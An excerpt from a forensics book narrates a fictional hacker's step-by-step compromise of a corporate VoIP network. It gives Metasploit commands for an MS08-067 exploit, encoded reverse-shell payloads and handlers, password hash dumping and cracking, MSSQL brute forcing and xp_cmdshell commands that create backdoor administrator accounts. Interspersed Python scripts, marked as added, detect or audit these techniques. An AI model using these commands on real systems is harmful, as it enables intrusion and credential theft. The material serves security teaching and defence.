Unified Communications Forensics: Anatomy of Common UC Attacks

In this excerpt from Unified Communications Forensics, learn how hackers gain access into UC systems and how to scan the network for vulnerabilities.


The following is an excerpt from the book Unified Communications Forensics written by Nicholas Grant and Joseph W. Shaw II and published by Syngress. This section from chapter 7 reveals how hackers can gain initial access into UC systems and how to scan the network for potential vulnerabilities.

INTRODUCTION

5N|P3R had been having fun with this network and now decided that this VoIP network he was playing with warranted further investigation. He was hoping to gain admin level access to the VoIP server, giving him complete control over their PBX. He also wanted to gain more information about the company along the way, which would come from exploiting as many machines on this network as he could. After all, not only was 5N|P3R interested in VoIP networks, he also wanted to own some machines where he could run C&C Botnets, and do some other nefarious things…

GAINING INITIAL ACCESS

5N|P3R sat staring at his screen, trying to decide on the best method to gain access to this network without raising too many alarms and alerting the administrators and information security group (if they even had one). During 5N|P3R's initial reconnaissance, he had identified about 30 different email addresses; so it had been decided for him: a targeted social engineering email attack would be performed. 5N|P3R started up the Social-Engineer Toolkit (SET) and quickly flew through the menu prompts, selecting the options he wanted and adding the email addresses he had identified earlier. 5N|P3R had decided to launch his attack during business hours, thinking that he would have the most success during that time, so he fired off his email attacks at 12:17, thinking that as people returned from lunch they would be clicking on the link he had included within the email. 5N|P3R sat staring at his screen. Three connections popped up on his console. Of the 30 emails he had sent out, 3 had prompted people to click on his malicious link. As soon as they had clicked the link, their machines downloaded a file; when they double-clicked on this file (which 5N|P3R had crafted) the users were shown a PDF file, but in reality this file had initiated a remote tunnel back to his machine with a command prompt on the victims' machines.


SCANNING THE NETWORK FOR POTENTIAL VULNERABILITIES

5N|P3R quickly dumped the hashes on each of these machines and began searching the machines to see what each of them had installed. Gotcha! 5N|P3R thought to himself. He had identified that one of the machines was running VMware Player. 5N|P3R had cracked some of the passwords from the hash file and was able to log into the machine with a local administrator's password. He quickly downloaded an image of Kali Linux (which is a replacement for BackTrack). 5N|P3R extracted the virtual machine's image and booted the Kali machine.

VULNERABILITIES AND EXPLOITS

5N|P3R checked to see what his IP address was and which subnet he was connected to by running the command:

ifconfig

5N|P3R's IP address came back as inet addr:10.0.0.149. 5N|P3R made an educated guess that he was on a /24 subnet and decided to use 10.0.0.0/24 as his subnet.

Discovery Scanning and Identification of Vulnerabilities

Next 5N|P3R quickly fired off an nmap scan to discover which hosts were live on the network and to determine which ports on these hosts might be open. 5N|P3R then downloaded Nessus from Tenable's Web site at http://www.tenable.com/products/nessus/select-your-operating-system, getting an activation code at http://www.tenable.com/products/nessus/nessus-plugins/obtain-anactivation-code. Then he ran the following commands to install, configure, and start Nessus:

dpkg -i Nessus-5.2.1-debian6_i386.deb

cd /opt/nessus/bin

./nessus-fetch --register "QWERTY-XXXXX-XXXXX-XXXXX"

service nessusd start

Next 5N|P3R launched a browser and surfed over to https://kali:8834. He then created a new scan with the live hosts that he found while running his nmap scan.

A handful of possible vulnerabilities were identified.

5N|P3R has been using Metasploit since it was first released many years ago. Now that BackTrack has become Kali Linux, there are a few key differences. Kali Linux took a departure from BackTrack and no longer starts a bunch of network services at boot, including database services. In order to get Metasploit up and running, 5N|P3R had to issue the following commands:

service postgresql start

msfupdate

msfconsole

msfupdate will automatically start the Metasploit RPC server (prosvc) and the Metasploit Web server. If 5N|P3R had already updated his installation of Metasploit, he would have used:

service metasploit start

msfconsole

The first time msfconsole is run, the initial Metasploit database will be created. If 5N|P3R wished to start Metasploit at boot, he could have issued the following commands:

update-rc.d postgresql enable

update-rc.d metasploit enable

To ensure everything with Metasploit is working correctly, 5N|P3R issued the following command from the msf prompt:

msf > db_status

Which then returned:

[*] postgresql connected to ms

Next he created a workspace for his current "project" and connected to it.

workspace -a voip_network

workspace voip_network

[*] Workspace: voip_network

Any time 5N|P3R wishes to see which workspace he is connected to, he can simply type "workspace" from the msf prompt, which will return all workspaces and include an "*" in front of the currently connected workspace.

msf > workspace

default

* voip_network

There are multiple ways to import data from Nessus. Since 5N|P3R has already installed and run a scan from Nessus, he will just connect directly to Nessus from within Metasploit to import the data. Once the Nessus module is loaded, the report_list command will list the scans that are available from within Nessus.

load nessus

nessus_connect secvoip:secvoip@kali:8834 ok

nessus_report_list

nessus_report_get 4e29b60e-d9d4-65ba-7343-6d69109fc2fccfbb8e8a4bf77d2b

Once these commands complete, the response "Done" is returned, letting 5N|P3R know that the command has completed successfully. Next 5N|P3R issues the "Run" command, which lists the hosts that have been imported from Nessus into Metasploit. This command also shows the name of the OS and Version.

5N|P3R remembered some of the critical vulnerabilities he saw listed in Nessus, one of which was that the Windows XP host at 10.0.0.146 looks to be running SP1. As such, he knew that the host would most likely be vulnerable to the MS08-067 exploit, so next he issued the following commands in the Metasploit console:

search ms08-067

use exploit/windows/smb/ms08_067_netapi

set PAYLOAD windows/meterpreter/reverse_tcp

show options

5N|P3R then issued the commands to set the options for this specific module:

set RHOST

set LHOST

set LPORT 80

He next ran the module against the machine with the exploit command. Much as 5N|P3R had expected, the module ran and the machine was exploited using the MS08-067 vulnerability, and he was greeted with the meterpreter > prompt. He then issued the sysinfo command to see basic information about the machine he had just owned, then he ran the hashdump command to dump the hashes on the machine.


There are many attacks in which these hashes can be used, such as the "pass the hash" attack. But 5N|P3R always likes to have as many options available to him as possible, so he decided to try and crack the passwords of these hashes. He cut and pasted the user names and hash values into a plain text file he named hash.txt. 5N|P3R then used the tool John the Ripper to begin cracking these hashed passwords. Ten minutes later, 5N|P3R checked his console and saw the following output, where the Administrator and secvoip accounts had been cracked. The way Microsoft stores passwords is in two halves, so the Administrator password is gained from combining (Administrator:1) and (Administrator:2) for a password of "anywhere". The same is done with the secvoip account, which reveals the password to be "n3v3rgu3ss." Left running long enough, the other three accounts, Guest, HelpAssistant, and SUPPORT, would eventually have been cracked, but 5N|P3R knows these default accounts will not provide as much access as Administrator and secvoip.
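A defender-side check for the weakness this paragraph depends on, added here as an example and not taken from the book: it reads pwdump-style lines (user:rid:LM:NT:::) and flags accounts that still have an LM hash stored, including those whose second LM half is the empty-half constant, meaning the password is seven characters or fewer. The account names and hash values in the sample are constructed.

```python
"""Audit pwdump-style output for stored LM hashes (added example, constructed data)."""
import re

# LM hashing splits the upper-cased password into two 7-character halves and
# hashes each one independently; an empty half always produces this constant.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of a blank password
HEX32 = re.compile(r"[0-9a-f]{32}")

# Constructed sample in user:rid:lm:nt::: form; the hash values are made up.
SAMPLE = """\
Administrator:500:0f1e2d3c4b5a6978a1b2c3d4e5f60718:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
kiosk:1004:1122334455667788aad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
svc_backup:1005:aad3b435b51404eeaad3b435b51404ee:a0b1c2d3e4f5061728394a5b6c7d8e9f:::
"""

def audit(text):
    """Return (user, finding) pairs in input order."""
    findings = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, lm, nt = parts[0], parts[2].lower(), parts[3].lower()
        if nt == EMPTY_NT:
            findings.append((user, "blank-nt-hash"))
        # Some dump tools print a text marker instead of a hash when no LM
        # hash is stored; anything that is not 32 hex digits is treated as none.
        if not HEX32.fullmatch(lm) or lm == EMPTY_LM:
            continue
        if lm[16:] == EMPTY_LM_HALF:
            findings.append((user, "lm-stored-max-7-chars"))
        else:
            findings.append((user, "lm-stored"))
    return findings

if __name__ == "__main__":
    for user, finding in audit(SAMPLE):
        print(f"{user}: {finding}")
```

Accounts flagged here keep an LM hash until their password is changed after the "Do not store LAN Manager hash value on next password change" policy is enabled.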

5N|P3R ran through the gamut of post exploitation modules included in Metasploit, but he came up with nothing. So he began searching the exploited system's hard drive for common files, using the search command in meterpreter. 5N|P3R searched for files with the extension .txt, .pwd, and .vnc on the computer he had just owned. With the command search -f *.vnc, he received three hits that looked promising. All three hits were for the file named "10.0.0.147.vnc." From the meterpreter prompt, he quickly ran the command download "c:\\Documents and Settings\\Administrator\\Desktop\\10.0.0.147.vnc" which downloaded the "10.0.0.147.vnc" file to his local machine.

Looking at the contents of the file, he quickly discovered that this file had the stored password to the VNC server running on the host machine at 10.0.0.147.

5N|P3R fired up a Windows XP virtual machine and downloaded and installed the TightVNC client. Next he copied the contents of the 10.0.0.147.vnc file, which he had downloaded to his Kali Linux machine. Then he opened up notepad.exe on the XP virtual machine and pasted the contents into the document. 5N|P3R clicked File and saved this file as "10.0.0.147.vnc" to the desktop. 5N|P3R next simply double-clicked on the file he had just created and now had access to this new host at 10.0.0.147. He opened up a command prompt and ran ipconfig to make sure he was indeed attached to the host he was expecting. Next he decided to add an account: net user /add hack password1 and then added his user hack to the local administrators group: net localgroup administrators /add hack.

5N|P3R used msfpayload and msfencode to create and encode an executable and then copied this "exploit.exe" file to the host at 10.0.0.147 (the same system to which he had just used TightVNC to connect remotely). The "exploit.exe" file, once executed, would then connect back to his Kali Linux box with a meterpreter shell, so he issued the command for msfcli to listen for the incoming meterpreter connection.

msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.149 LPORT=80 EXITFUNC=thread

msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 2 > exploit.exe

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.149 LPORT=80 E

After executing his "exploit.exe" file, 5N|P3R received a connection to a meterpreter shell.

5N|P3R then ran the same two commands he always does, sysinfo and hashdump, and again copied the hashes to a plain text file, and began running john against this new file. He once again began running through the post exploitation modules; however, this time, upon issuing the command run post/windows/gather/credentials/mremote he received a user name and password for the machine at 10.0.0.199, which he had previously identified as the PBX VoIP machine that he was ultimately after.

With these new credentials, 5N|P3R dropped to a command prompt and issued the command:

ssh root@10.0.0.199

5N|P3R then entered the password "pbxadmin" which he had just received while running the post mremote module and was granted root access to the PBX, which also told him that there was a web GUI running at http://10.0.0.199. Excellent!!! he thought to himself.

5N|P3R backgrounded the current meterpreter shells he had and decided to take a look at some other services or applications that he might be able to exploit. Noticing that there appeared to be a few instances of SQL running on the network, 5N|P3R began a more in-depth scan of these instances. Back at the msf console, he loaded up the mssql_login module and ran it against the entire subnet.

use auxiliary/scanner/mssql/mssql_ping

hosts -R

exploit


5N|P3R now had a listing of all the MSSQL servers, the port each server was running on, and the Instance Name. He knew that one of these would be vulnerable to the xp_cmdshell function, but before he could successfully utilize the xp_cmdshell auxiliary module, he would need to know the sa account's password. With all the MSSQL servers running on different ports, he would have to try brute-forcing each instance of MSSQL individually. So in Metasploit, he loaded up the brute force module for MSSQL and set the password file:

use auxiliary/scanner/mssql/mssql_login

set PASS_FILE /usr/share/john/password.lst

5N|P3R began to run through the IPs of the MSSQL servers. Setting the RHOST and RPORT values for each server, he started to wonder if he was ever going to find a password with which he would be able to add an account utilizing xp_cmdshell. On the last MSSQL server, he let out a sigh of relief as it returned "successful login."
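What this password guessing looks like from the database server's side, as an added detection example that is not part of the book: it parses login audit lines in the style of SQL Server's ERRORLOG and reports a burst of failures for one login from one client, and a success that follows such a burst. The log lines, threshold and window are constructed assumptions.

```python
"""Spot password guessing against SQL logins in an ERRORLOG (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed lines in the style of SQL Server's ERRORLOG. Login auditing must
# record both failed and successful logins for the "succeeded" line to exist.
LOG = """\
2014-04-01 12:30:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.149]
2014-04-01 12:30:01.90 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.149]
2014-04-01 12:30:02.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.149]
2014-04-01 12:30:03.00 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.149]
2014-04-01 12:45:00.00 Logon       Login failed for user 'report'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.20]
"""
LINE = re.compile(
    r"^(\S+ \S+) Logon\s+Login (failed|succeeded) for user '([^']*)'.*\[CLIENT: ([^\]]+)\]")

def detect(log, threshold=3, window=timedelta(minutes=5)):
    """Return (alert, client, login) tuples in log order."""
    fails = defaultdict(list)   # (client, login) -> recent failure times
    alerts = []
    for line in log.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        when = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
        key = (m.group(4), m.group(3))
        recent = [t for t in fails[key] if when - t <= window]
        if m.group(2) == "failed":
            recent.append(when)
            fails[key] = recent
            if len(recent) == threshold:      # alert once per burst
                alerts.append(("guessing", *key))
        else:
            if len(recent) >= threshold:      # the guessing found the password
                alerts.append(("success-after-guessing", *key))
            fails[key] = []
    return alerts

if __name__ == "__main__":
    for alert in detect(LOG):
        print(alert)
```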

With all the information needed to utilize the xp_cmdshell to add an account and add that account to the local administrators group, he loaded and set the variables for the mssql_exec module.

use auxiliary/admin/mssql/mssql_exec

set RPORT 53340

set RHOST 10.0.0.148

set PASSWORD Dbmaster123

set cmd net user /add hack hack123

show options

He then issued the run command and the module's output returned "The command completed successfully."

5N|P3R had successfully added an account named "hack," so he changed the CMD that the module would run: he needed to add his new "hack" account to the local administrators group, and he successfully ran:

set CMD net localgroup administrators hack /add

run

Once again he saw the "The command completed successfully" message returned from the msf console. He then ran the command services -p 3389, and it returned that the machine at 10.0.0.148, on which he had just successfully created an account, already had RDP enabled. 5N|P3R then clicked on "Start" and then "Run," typed in "mstsc.exe," and pressed "Enter" on his Windows XP virtual machine. He was greeted with a login prompt; he entered "hack" for the username and "hack123" for the password and pressed "Enter." He was then logged into the 10.0.0.148 machine.
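The two net commands run through xp_cmdshell above leave a recognizable pair of Windows Security events: a local account is created, then the same account is added to the local Administrators group. The following correlation is an added example, not from the book; it uses event IDs 4720 and 4732 as logged by Windows Vista/Server 2008 and later, and the events, SIDs and timestamps are constructed.

```python
"""Correlate local account creation with admin-group membership (added example)."""
from datetime import datetime, timedelta

ADMINS_SID = "S-1-5-32-544"      # well-known SID of the local Administrators group
WINDOW = timedelta(minutes=10)   # assumed correlation window

# Constructed Security-log events, reduced to the fields used here.
# 4720 = user account created; 4732 = member added to a local group.
EVENTS = [
    {"time": "2014-04-01T12:41:07", "id": 4720, "host": "10.0.0.148",
     "SubjectUserName": "SYSTEM", "TargetUserName": "hack",
     "TargetSid": "S-1-5-21-1-2-3-1010"},
    {"time": "2014-04-01T12:42:30", "id": 4732, "host": "10.0.0.148",
     "SubjectUserName": "SYSTEM", "MemberSid": "S-1-5-21-1-2-3-1010",
     "TargetSid": ADMINS_SID},
    {"time": "2014-04-01T09:00:00", "id": 4720, "host": "10.0.0.150",
     "SubjectUserName": "helpdesk1", "TargetUserName": "jsmith",
     "TargetSid": "S-1-5-21-4-5-6-1200"},
    {"time": "2014-04-01T09:01:00", "id": 4732, "host": "10.0.0.150",
     "SubjectUserName": "helpdesk1", "MemberSid": "S-1-5-21-4-5-6-1200",
     "TargetSid": "S-1-5-32-555"},   # Remote Desktop Users, not Administrators
]

def find_new_local_admins(events, window=WINDOW):
    """Alert when an account joins Administrators soon after being created."""
    created = {}   # (host, account SID) -> (creation time, account name)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[(ev["host"], ev["TargetSid"])] = (when, ev["TargetUserName"])
        elif ev["id"] == 4732 and ev["TargetSid"] == ADMINS_SID:
            hit = created.get((ev["host"], ev["MemberSid"]))
            if hit and when - hit[0] <= window:
                alerts.append({
                    "host": ev["host"], "account": hit[1],
                    "actor": ev["SubjectUserName"],
                    "seconds_after_creation": int((when - hit[0]).total_seconds()),
                })
    return alerts

if __name__ == "__main__":
    for alert in find_new_local_admins(EVENTS):
        print(alert)
```

An actor that is a service identity rather than a named administrator, as in the constructed first pair, is the detail that separates this from routine help-desk provisioning.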

5N|P3R began browsing the local machine's directories; as he had added his "hack" user account to the local administrators group, he was able to look through each user's files on this machine. On the Administrator's desktop, he found a PBXADMINTOOLS directory which contained PuTTY and a batch file. Opening the voipserver.bat file, 5N|P3R found that it was a simple batch file which launched PuTTY, but the creator had stored the settings along with the password for root on the PBX server.
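Both the saved 10.0.0.147.vnc connection file and the voipserver.bat launcher are credentials left readable on disk, and an administrator can look for them before an intruder does. The scanner below is an added example, not from the book; it assumes the .vnc file is INI-style with a password= line and that the batch file passes the password with PuTTY's -pw option, and it runs against a constructed directory tree.

```python
"""Find remote-access passwords saved in files (added example, constructed data)."""
import os
import re
import tempfile

# Assumption: .vnc connection files are INI-style with a password=<hex> line.
VNC_PASSWORD = re.compile(r"^\s*password\s*=\s*\S+", re.I | re.M)
# PuTTY and plink accept the password on the command line with -pw.
PUTTY_PW = re.compile(r"\b(putty|plink)(\.exe)?\b.*\s-pw\s+\S+", re.I)

def scan_tree(root):
    """Return sorted (relative path, reason) pairs; the secret is never returned."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if ext not in (".vnc", ".bat", ".cmd"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                text = fh.read(1_000_000)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if ext == ".vnc" and VNC_PASSWORD.search(text):
                findings.append((rel, "vnc-saved-password"))
            elif ext != ".vnc" and any(PUTTY_PW.search(l) for l in text.splitlines()):
                findings.append((rel, "putty-pw-on-command-line"))
    return sorted(findings)

def demo():
    """Scan a constructed profile tree modelled on the files in the narrative."""
    files = {
        "Desktop/10.0.0.147.vnc": "[connection]\nhost=10.0.0.147\npassword=0011223344556677\n",
        "Desktop/PBXADMINTOOLS/voipserver.bat": "start putty.exe -ssh root@10.0.0.199 -pw EXAMPLE-ONLY\n",
        "Desktop/lab.vnc": "[connection]\nhost=10.0.0.150\n",   # no saved password
        "Desktop/backup.bat": "putty.exe -ssh admin@10.0.0.10\n",  # prompts instead
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason}: {rel}")
```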

 

About the authors:
Nicholas Grant is an information security professional with over ten years of experience within the industry. He holds a CISSP and has an M.S. in Management of Information Systems Security from Colorado Technical Institute. He works as a Vulnerability Manager for a large financial institution and is a professor, teaching Bachelor's and Associate-level courses at a nationally accredited university.

Joseph W. Shaw II (CISM, CISSP, EnCE, GAWN) has been working in Information Security for over 18 years, with experience in industry verticals including telecommunications, energy, luxury retail, legal, and healthcare. He is now a consultant for a large worldwide professional services company, where he provides expertise in Digital Forensics with an emphasis on incident response, malware analysis and reverse engineering, vulnerability assessment, penetration testing, and security event and incident management.

This was first published in April 2014
